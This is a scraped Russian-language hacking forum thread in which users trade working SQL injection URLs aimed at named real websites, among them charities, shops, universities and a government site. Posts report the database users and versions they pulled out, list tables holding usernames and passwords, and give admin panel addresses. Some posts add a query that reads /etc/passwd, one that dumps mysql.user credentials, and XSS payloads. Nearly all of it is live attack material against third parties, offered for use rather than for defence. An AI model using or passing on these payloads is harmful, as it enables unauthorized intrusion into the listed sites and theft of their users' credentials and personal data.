SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    p_blog@localhost:4.1.21:p_blog
     
    4 people like this.
  2. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    User: [email protected]
    Version:5.0.27-standard-log
    Dbname:marianweb

    мини хостинг. юзер - рут.версия -5.
     
    #11522 $n@ke, 19 Mar 2010
    Last edited: 19 Mar 2010
    1 person likes this.
  3. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Code:
    http://www.romanempiretours.com/stour.php?id=11+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+--+
    MySql 5.1
     
  4. Dr..VATSON

    Dr..VATSON Elder - Старейшина

    Joined:
    7 Dec 2008
    Messages:
    52
    Likes Received:
    53
    Reputations:
    18
    ТИЦ = 10

    5.0.22-Debian_0ubuntu6.06.12-log


    Code:
    http://www.ibis.dk/stoet/index.php?mode=readmenu&menuId=-23+union+select+1,group_concat%28column_name%29,3,4,5,6+from+information_schema.columns+   where+table_name=char%28107,105,100,95,115,116,97,102,102%29%20--
    Из таблицы kid_staff

    staff_id
    username
    password
    usertype
    firstname
    middlename
    lastname
    gender
    country
    country_es
    region
    nationality
    nationality_es
    birthdate
    lastmod
    webstatus
    rank
    status
     
    #11524 Dr..VATSON, 19 Mar 2010
    Last edited by a moderator: 20 Mar 2010
    1 person likes this.
  5. Dr..VATSON

    Dr..VATSON Elder - Старейшина

    Joined:
    7 Dec 2008
    Messages:
    52
    Likes Received:
    53
    Reputations:
    18
    Code:
    http://jobmillion.com/en/member/detail-job.php?action=showlist&ID=-10+union+select+1,2,3,4,5,6,7,8,group_concat%28million_system_staff_Password%29,group_concat%28million_system_staff_UserName%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+million_system_staff%20--

    Из таблицы million_system_staff

    В Ы В О Д И Т С Я

    million_system_staff_ID
    million_system_staff_Name
    million_system_staff_Email
    million_system_staff_UserName
    million_system_staff_Password
    million_system_staff_CreateByID
    million_system_staff_CreateBy
    million_system_staff_CreateDate
    million_system_staff_LastLoginDate
    million_system_staff_Status
    million_system_staff_Level


    А Д М И Н К А

    http://jobmillion.com/stats



    Code:
    http://www.infowomen.org/portfolio/clc/web_app/admin/job.php?job_id=-1+union+select+group_concat%28column_name%29+from+information_schema.columns+where+table_name=char%28116,98,108,95,112,101,114,115,111,110,115%29%20--

    Из таблицы tbl_persons

    В Ы В О Д И Т С Я

    person_id
    first_name
    last_name
    client_id
    job_id
    email_address
    password
    y_n_recipient


    А Д М И Н К А

    http://www.infowomen.org/admin


    ТИЦ = 10

    5.1.26-rc

    AVTOTYRE@localhost



    Code:
    http://www.avto-tyre.ru/shop.php?id=-27+union+select+1,2,group_concat%28column_name%29,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=char%2897,100,100,114,101,115,115%29%20--
    Из таблицы address

    address_id
    user_id
    name
    index
    region
    city
    street
    telephon
    info
    address_id
    user_id
    index
    region
    district
    city
    name
    telephon
    fax
    street
    house
    building
    stroenie
    flat
    entrance
    floor
    code
    info
     
    #11525 Dr..VATSON, 20 Mar 2010
    Last edited: 20 Mar 2010
  6. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Code:
    http://www.brain-tumor.org/?id=-11+union+select+1,concat%28user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+
     
    2 people like this.
  7. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    http://www.accessoriescoop.com/products.php?cid=49/**/and/**/1=2/**/union/**/select/**/1,version(),3,4/*

    4.1.22-standard

    Не смог подобрать названия таблиц, стыдно конечно (. Как можно заюзать такие скули? Help somebody
     
    2 people like this.
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.naregatsi.org/new/arm/events/up_events_details.php?event_id=1+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28

    version() 5.1.45-log
    user() naregats_tigran@localhost
    database() naregats_naregatsi

    + XSS

    http://www.naregatsi.org/new/arm/events/up_events_details.php?event_id=1+and+1=0+union+select+1,2,3,4,5,<img src=http://forum.antichat.ru/antichat/pic/logo.gif width=500 hegth=800></img>,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
     
    _________________________
    2 people like this.
  9. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    http://surediamond.com/product.php?disproid=53+union+select+1,2,version(),4,5--
    можно ли както раскрутить дальше ? подскажите в пм , спс.
     
    #11529 SEWERN, 21 Mar 2010
    Last edited: 21 Mar 2010
  10. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://www.che-esche.com/fullafisha.php?id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15
    Code:
    http://thedivinemercy.org/news/department.php?PLID=-72+union+select+1,user(),version(),4,5/*
    Code:
    http://www.ktcomputer.de/start.php?kat=news&kat_id=-1+union+select+1,2,3,4,5,6,7,8,version(),user(),11,12,13,14,15,16,17--
    Первые SQL-ы, практикуюсь :)
     
    2 people like this.
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.revues-plurielles.org/php/index.php?nav=revue&no=17+union+select+1,2,3,4,5

    OS -Windows NT

    user() revues-plu-admin@localhost
    version() 5.0.21-community-nt
    database() revues-plurielles

    + XSS

    http://www.revues-plurielles.org/php/index.php?nav=revue&no="><script>alert('ANTICHAT')</script>
     
    _________________________
    2 people like this.
  12. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://www.zeltarasa.com/?lang=ru&id=1+union+select+1,concat_ws(0x3a,user(),database(),version())+--
    Code:
    http://www.fotomundo.com/nota.php?id=-1+union+select+1,2,3,4,version(),user(),7,database(),9,10,11,12,13,14,15--
    Code:
    http://krasuis.ru/inset/foto.php?id=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4--
    Code:
    http://www.provisor.com.ua/news.php?art=-1+union+select+1,2,3,4,5,6,7,user(),version(),database()--
    Code:
    http://www.boxclever.ca/news.php?id=-1+union+select+version(),2,user(),database(),5+--+
    Code:
    http://www.ekomtech.kiev.ua/a-news/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9--
    Code:
    http://shepherdpost.christianpost.com/mainbox/news.php?cat=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9+--+
    Здесь можно посмотреть таблицы:
    Code:
    http://shepherdpost.christianpost.com/mainbox/news.php?cat=-1+union+select+1,2,3,table_name,5,6,7,8,9+from+information_schema.tables+--
    Code:
    http://dev.ultimareplenisher.com/news.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version()),2--
    Code:
    http://www.kpbptpn.co.id/news.php?lang=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13--
    Code:
    http://views24hours.com/view24hours/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9--
    Здесь вывод в самом низу, справа.
    Code:
    http://www.tagittins.co.uk/news.php?id=-1+union+select+1,user(),3,database(),5,6,7,8,9--
    Code:
    http://avto-tire.ru/item_view.php?id=&item_id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17+--+
    Здесь 54 таблицы, последняя:
    Code:
    http://avto-tire.ru/item_view.php?id=&item_id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables+limit+54,1--+
    Code:
    http://www.ctaholidays.net/beta/holiday_details.php?id=-1+union+select+1,2,3,4,5,6,7,user(),9,10,11,12,13,14,database()--
     
    #11532 root_sashok, 21 Mar 2010
    Last edited: 22 Mar 2010
    2 people like this.
  13. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    User: scully@localhost
    Version: 4.1.22-log
    Dbname: scully

    есть таблица мемберс
     
    1 person likes this.
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+select+1,2,3,concat(user,char(58),password),5,6+from+mysql.user--

    OS - Debian GNU/Linux

    user() : root@localhost

    version() : 4.0.24_Debian-10sarge1-log

    database() : ens_data


    robots.txt:

    User-agent: *
    Disallow: /chbpascal/
    Disallow: /college/video_college
    Disallow: /college/photos
    Disallow: /college/vignettes
    Disallow: /college/en/video_college
    Disallow: /college/en/photos
    Disallow: /college/en/vignettes
    Disallow: /en/audio
    Disallow: /en/bonus
    Disallow: /en/photos
    Disallow: /en/video
    Disallow: /en/video_stream
    Disallow: /en/vignettes
    Disallow: /pear
    Disallow: /photos
    Disallow: /administration
    Disallow: /vignettes
    Disallow: /college2
    Disallow: /video
    Disallow: /audio
    Disallow: /video_stream
    Disallow: /bonus

    /etc/passwd

    http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+select+1,2,3,load_file(CHAR(47,101,116,99,47,112,97,115,115,119,100)),5,6+from+mysql.user--



    +XSS

    http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+select+1,2,3,<img src=http://img525.imageshack.us/img525/7127/matrixic9.jpg></img>,5,6--
     
    _________________________
    3 people like this.
  15. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Здесь вывод в заголовке:
    Code:
    http://map64.ru/index.php?id=-1+union+select+user()--
    Есть таблица users, она последняя:
    Code:
    http://map64.ru/index.php?id=-1+union+select+table_name+from+information_schema.tables+limit+23,1--
    Админка:
    Code:
    http://www.map64.ru/job
     
    #11535 root_sashok, 22 Mar 2010
    Last edited: 22 Mar 2010
    2 people like this.
  16. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    dudu,edu

    version:4
    ----------------------------------
    вывод в тайтле
     
    #11536 $n@ke, 22 Mar 2010
    Last edited: 22 Mar 2010
    2 people like this.
  17. kori256

    kori256 Member

    Joined:
    7 Feb 2009
    Messages:
    49
    Likes Received:
    33
    Reputations:
    6
    и оно же
    User: dynamicdb@localhost
    Version: 5.0.27
    Dbname: dynamic
     
    #11537 kori256, 22 Mar 2010
    Last edited: 22 Mar 2010
    2 people like this.
  18. root_sashok

    root_sashok Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    389
    Likes Received:
    573
    Reputations:
    102
    Code:
    http://www.conacyt.gov.py/admin/mostrar.php?noti=imagen&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())--
    Username: web@localhost
    Database: web
    Version: 5.0.26

    Code:
    http://www.wyoptv.org/programming/viewprogram.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,version(),database()/*
    Username: wyoptv@localhost
    Database: wyoptv
    Version: 5.0.32-Debian_7etch6-log

    Code:
    http://www.2how.com/board/index.php?group=-1+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12,13--
    Username: root@localhost
    Database: howhow_board
    Version: 5.0.67-log

    Code:
    http://www.china-efe.org/article/article_show.php?article_id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16--
    Username: chinaedu@localhost
    Database: chinaefe
    Version: 5.1.11-beta-log
     
    #11538 root_sashok, 22 Mar 2010
    Last edited: 22 Mar 2010
    1 person likes this.
  19. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Code:
    http://lf-j.com/regi.php?id=-19+union+select+1,2,version%28%29,4,5,6,7,8,9+--+
    Version: 5.0.89-community-log
    User: lfjcom_user@localhost
    Database: lfjcom_db

    Code:
    http://www.pitatel.com/pclass.php?id=-19+union+select+1,2,3,4,5,concat%28user%28%29,database%28%29,version%28%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
    Version: 4.0.22-standard 5
    User: root@localhost
    Database: mysql 5
     
    #11539 CyberHunter, 22 Mar 2010
    Last edited: 22 Mar 2010
  20. KENTov

    KENTov New Member

    Joined:
    16 Dec 2009
    Messages:
    4
    Likes Received:
    4
    Reputations:
    1
    ШкОлОтЭ ищет sql инъекции :rolleyes: :rolleyes: :rolleyes:

    PHP:
    Targethttp://www.turmanidze.ge/en/main.php?id=1223989248
    Host IP: 212.72.131.186
    Web Server: Apache/2.2.14 (FreeBSD) DAV/2
    DB Server: MySQL >=5
    Current User: turmanidze@localhost
    Sql Version: 5.0.77
    Current DB: turmanidze
    System User: turmanidze@localhost
    Host Name: webserver.sanet.ge
    Installation dir: /usr/local/
    DB User: 'turmanidze'@'localhost'
    Data Bases: information_schema
    test
    turmanidze



    http://www.turmanidze.ge/admin/
    http://www.turmanidze.ge/phpmyadmin/

    в userlist смотрите пасс и логин, правда у меня что-то не подходит :mad:
     
    2 people like this.
Thread Status:
Not open for further replies.